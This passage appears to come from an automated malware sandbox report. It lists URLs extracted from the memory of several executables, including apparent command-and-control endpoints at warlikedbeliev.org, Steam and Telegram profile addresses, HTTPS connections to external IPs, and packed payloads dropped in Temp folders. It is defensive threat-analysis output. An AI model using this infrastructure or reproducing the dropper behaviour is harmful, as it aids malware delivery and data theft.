                            Source: df1b740bf8.exe, 0000001E.00000002.2077168119.00000000012C8000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057160888.00000000012C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
                            Source: Avoiding.com, 0000001C.00000002.2775848243.0000000001B90000.00000004.00000800.00020000.00000000.sdmp, Avoiding.com, 0000001C.00000002.2769015216.0000000001A3A000.00000004.00000020.00020000.00000000.sdmp, Avoiding.com, 0000001C.00000002.2769015216.00000000019D1000.00000004.00000020.00020000.00000000.sdmp, Avoiding.com, 0000001C.00000002.2785734233.0000000004A71000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199820567237
                            Source: Avoiding.com, 0000001C.00000002.2785734233.0000000004A71000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199820567237hac22tlMozilla/5.0
                            Source: df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
                            Source: df1b740bf8.exe, 0000001E.00000003.2056711677.0000000001306000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000002.2077910208.0000000001306000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamloopback.host
                            Source: df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
                            Source: df1b740bf8.exe, 0000001E.00000003.2056711677.0000000001306000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000002.2077910208.0000000001306000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
                            Source: df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
                            Source: df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
                            Source: df1b740bf8.exe, 0000001E.00000003.2056711677.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000002.2079280580.0000000001359000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
                            Source: df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
                            Source: df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
                            Source: df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
                            Source: df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                            Source: df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
                            Source: df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
                            Source: df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                            Source: ktIplF5.exe, 0000000F.00000003.1958512091.0000000005E01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                            Source: ktIplF5.exe, 0000000F.00000003.1958512091.0000000005E01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: Avoiding.com, 0000001C.00000002.2775848243.0000000001B90000.00000004.00000800.00020000.00000000.sdmp, Avoiding.com, 0000001C.00000002.2769015216.0000000001A3A000.00000004.00000020.00020000.00000000.sdmp, Avoiding.com, 0000001C.00000002.2769015216.00000000019D1000.00000004.00000020.00020000.00000000.sdmp, Avoiding.com, 0000001C.00000002.2785734233.0000000004A71000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: https://t.me/m08mbk
Source: Avoiding.com, 0000001C.00000002.2785734233.0000000004A71000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: https://t.me/m08mbkhac22tlMozilla/5.0
Source: ktIplF5.exe, 0000000F.00000003.1922898550.00000000011F7000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.2077139965.0000000001264000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.2036330174.00000000011CD000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1972196562.0000000001264000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1922708217.00000000011D4000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.2092673789.00000000011CE000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.2035830156.0000000001264000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1955909943.0000000001264000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.2045528163.0000000001264000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000002.2108613468.0000000001264000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.2091437851.0000000001254000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.2077350251.00000000011CD000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.2092149483.0000000001260000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1957093991.0000000001264000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.2077041931.00000000011F7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://warlikedbeliev.org/
Source: ktIplF5.exe, 0000000F.00000002.2108189234.00000000011CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://warlikedbeliev.org//
Source: ktIplF5.exe, 0000000F.00000003.1972196562.0000000001264000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1955909943.0000000001264000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1957093991.0000000001264000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://warlikedbeliev.org/C
Source: ktIplF5.exe, 0000000F.00000003.1972196562.0000000001264000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.2092408415.00000000011F7000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1958351110.0000000005AE7000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1973189454.0000000005AE7000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1971970302.0000000005AE7000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.2045528163.0000000001264000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1972196562.0000000001239000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000002.2108613468.0000000001264000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.2091707440.00000000011F7000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000002.2108392817.00000000011F7000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1956328304.0000000005AE7000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.2091437851.0000000001254000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.2092149483.0000000001260000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.2077041931.00000000011F7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://warlikedbeliev.org/api
Source: ktIplF5.exe, 0000000F.00000003.1922898550.00000000011F7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://warlikedbeliev.org/api%
Source: ktIplF5.exe, 0000000F.00000002.2108613468.0000000001264000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.2091437851.0000000001254000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.2092149483.0000000001260000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://warlikedbeliev.org/api:
Source: AApUa7VQiy.exe, 00000000.00000003.1327817258.000000000144C000.00000004.00000020.00020000.00000000.sdmp, AApUa7VQiy.exe, 00000000.00000003.1327618460.000000000144A000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1955876898.0000000005AE6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://warlikedbeliev.org/apiD
Source: ktIplF5.exe, 0000000F.00000003.2035595673.00000000011F7000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.2077041931.00000000011F7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://warlikedbeliev.org/apimA
Source: AApUa7VQiy.exe, 00000000.00000003.1462219530.0000000001458000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://warlikedbeliev.org/apiow
Source: AApUa7VQiy.exe, 00000000.00000003.1327618460.0000000001458000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://warlikedbeliev.org/apisw
Source: ktIplF5.exe, 0000000F.00000003.2092408415.00000000011F7000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.2091707440.00000000011F7000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000002.2108392817.00000000011F7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://warlikedbeliev.org/apitA
Source: AApUa7VQiy.exe, 00000000.00000003.1327618460.0000000001458000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://warlikedbeliev.org/f
Source: AApUa7VQiy.exe, 00000000.00000003.1341672142.0000000005D7C000.00000004.00000800.00020000.00000000.sdmp, AApUa7VQiy.exe, 00000000.00000003.1340842040.0000000005D79000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://warlikedbeliev.org/iiI
Source: AApUa7VQiy.exe, 00000000.00000003.1368365608.0000000005D71000.00000004.00000800.00020000.00000000.sdmp, AApUa7VQiy.exe, 00000000.00000003.1353809567.0000000005D71000.00000004.00000800.00020000.00000000.sdmp, AApUa7VQiy.exe, 00000000.00000003.1462355882.0000000005D71000.00000004.00000800.00020000.00000000.sdmp, AApUa7VQiy.exe, 00000000.00000003.1383129075.0000000005D71000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://warlikedbeliev.org/ime
Source: ktIplF5.exe, 0000000F.00000003.2092408415.00000000011F7000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.2091707440.00000000011F7000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000002.2108392817.00000000011F7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://warlikedbeliev.org/rj
Source: AApUa7VQiy.exe, 00000000.00000003.1462219530.0000000001433000.00000004.00000020.00020000.00000000.sdmp, AApUa7VQiy.exe, 00000000.00000003.1382937606.0000000001433000.00000004.00000020.00020000.00000000.sdmp, AApUa7VQiy.exe, 00000000.00000003.1372532906.0000000001433000.00000004.00000020.00020000.00000000.sdmp, AApUa7VQiy.exe, 00000000.00000003.1327618460.0000000001433000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.2045528163.0000000001246000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://warlikedbeliev.org:443/api
Source: ktIplF5.exe, 0000000F.00000003.1973189454.0000000005AE7000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1971970302.0000000005AE7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_f6f292994d7c60be109e4c185cbc03032d36d17160d4e639
Source: Macromedia.com, 00000033.00000003.2233001765.00000000039AF000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 00000033.00000002.2765461914.0000000001023000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: infinity.exe, 0000000A.00000002.2748200742.0000000002081000.00000004.00001000.00020000.00000000.sdmp, infinity.exe, 0000000A.00000003.1831170949.0000000002081000.00000004.00001000.00020000.00000000.sdmp, infinity.exe, 0000000A.00000003.1831091705.0000000002380000.00000004.00001000.00020000.00000000.sdmp, infinity.tmp, 0000000B.00000002.2756011538.0000000000792000.00000004.00000020.00020000.00000000.sdmp, infinity.tmp, 0000000B.00000003.1832903310.0000000002198000.00000004.00001000.00020000.00000000.sdmp, infinity.tmp, 0000000B.00000003.1832825175.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, infinity.tmp, 0000000B.00000002.2762554326.0000000002198000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.easycutstudio.com/support.html
Source: AApUa7VQiy.exe, 00000000.00000003.1328782162.0000000005DC0000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1924188086.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1925261207.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1923621422.0000000005B2B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
Source: Macromedia.com, 00000033.00000002.2765461914.0000000001023000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.globalsign.com/repository/0
Source: df1b740bf8.exe, 0000001E.00000003.2056711677.0000000001306000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000002.2077910208.0000000001306000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com
Source: AApUa7VQiy.exe, 00000000.00000003.1328782162.0000000005DC0000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1924188086.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1925261207.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1923621422.0000000005B2B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: df1b740bf8.exe, 0000001E.00000002.2077910208.0000000001306000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/recaptcha/
Source: df1b740bf8.exe, 0000001E.00000003.2056711677.0000000001306000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000002.2077910208.0000000001306000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: df1b740bf8.exe, 0000001E.00000003.2056711677.0000000001306000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000002.2077910208.0000000001306000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: AApUa7VQiy.exe, 00000000.00000003.1368365608.0000000005D71000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1959045074.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: ktIplF5.exe, 0000000F.00000003.1958512091.0000000005E01000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.8Z86fTxZfkM6
Source: ktIplF5.exe, 0000000F.00000003.1958512091.0000000005E01000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.UnUp0v0CLe9Y
Source: AApUa7VQiy.exe, 00000000.00000003.1355170367.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1958512091.0000000005E01000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: ktIplF5.exe, 0000000F.00000003.1958512091.0000000005E01000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: AApUa7VQiy.exe, 00000000.00000003.1355170367.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1958512091.0000000005E01000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: df1b740bf8.exe, 0000001E.00000003.2056711677.0000000001306000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000002.2077910208.0000000001306000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.youtube.com
Source: df1b740bf8.exe, 0000001E.00000003.2056711677.0000000001306000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000002.2077910208.0000000001306000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.youtube.com/
Source: unknown | Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown | Network traffic detected: HTTP traffic on port 53476 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 53608
Source: unknown | Network traffic detected: HTTP traffic on port 53482 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 53564
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 53485
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 53646
Source: unknown | Network traffic detected: HTTP traffic on port 53669 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 53646 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 53533 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 53579 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 53473 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 53546 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 53632 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 53542 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 53538
Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 53592 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 53653
Source: unknown | Network traffic detected: HTTP traffic on port 53511 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 53650
Source: unknown | Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 53657
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 53579
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 53533
Source: unknown | Network traffic detected: HTTP traffic on port 53550 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 53666 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 53635 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 53469 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 53608 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 53465 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown | Network traffic detected: HTTP traffic on port 53673 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 53564 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 53548
Source: unknown | Network traffic detected: HTTP traffic on port 53650 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 53669
Source: unknown | Network traffic detected: HTTP traffic on port 53478 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 53621 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 53465
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 53542
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 53663
Source: unknown | Network traffic detected: HTTP traffic on port 53663 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 53469
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 53502
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 53546
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 53622
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 53666
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 53621
Source: unknown | Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 53502 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 53473
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 53550
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 53671
Source: unknown | Network traffic detected: HTTP traffic on port 53471 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 53471
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 53592
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown | Network traffic detected: HTTP traffic on port 53630 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 53653 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 53548 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 53638 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 53657 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 53481 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 53638
Source: unknown | Network traffic detected: HTTP traffic on port 53538 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 53622 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown | Network traffic detected: HTTP traffic on port 53485 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 53675
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 53476
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 53597
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 53630
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 53673
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 53474
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 53635
Source: unknown | Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 53511
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 53478
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 53632
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 53482
Source: unknown | Network traffic detected: HTTP traffic on port 53474 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 53481
Source: unknown | Network traffic detected: HTTP traffic on port 53597 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown | Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 53675 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 53671 -> 443
Source: unknown | HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:49707 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:49708 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:49710 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:49719 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:49727 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:49742 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:49750 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:49765 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 91.240.118.49:443 -> 192.168.2.11:53465 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:53469 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:53471 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:53473 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:53474 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:53476 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:53478 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.11:53481 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:53482 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:53485 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 176.113.115.96:443 -> 192.168.2.11:53502 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:53608 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:53622 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:53638 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:53650 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:53653 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:53657 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:53663 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:53666 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:53669 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:53671 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:53673 version: TLS 1.2

Spam, unwanted Advertisements and Ransom Demands

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B8DE7T9Q\random[1].exe entropy: 7.99815839126
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Temp\1062126001\a6c5834e2f.exe entropy: 7.99815839126
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\infinity[1].exe entropy: 7.99812251416
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Temp\1061683001\infinity.exe entropy: 7.99812251416
Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exe | File created: C:\Users\user\AppData\Local\Temp\Comics entropy: 7.99757886329
Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exe | File created: C:\Users\user\AppData\Local\Temp\Japanese entropy: 7.99686012246
